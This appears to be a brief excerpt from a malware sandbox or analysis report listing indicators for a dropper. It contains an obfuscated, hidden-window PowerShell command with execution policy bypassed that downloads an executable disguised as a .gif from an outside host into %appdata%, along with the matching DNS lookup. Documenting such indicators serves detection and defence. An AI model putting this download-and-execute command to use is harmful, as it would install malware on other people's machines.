Technical Information
- http://www.iemailpremium.com/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWErsHElL.eXE -ExecUTionpOlicY byPASs -nOProfILe -WinDowStyLe hiddEn (nEw-ObJecT SyStem.NEt.WEBClIEnT).DOWNLoaDFILe('http://www.iemailpremium.com/read.php?f=1.gif','%aPpDATa%.ex...
- DNS ASK ie####premium.com
- '<SYSTEM32>\cmd.exe' /c "PoWErsHElL.eXE -ExecUTionpOlicY byPASs -nOProfILe -WinDowStyLe hiddEn (nEw-ObJecT SyStem.NEt.WEBClIEnT).DOWNLoaDFILe('http://www.iemailpremium.com/read.php?f=1.gif','%aPpDATa%.ex...' (with hidden window)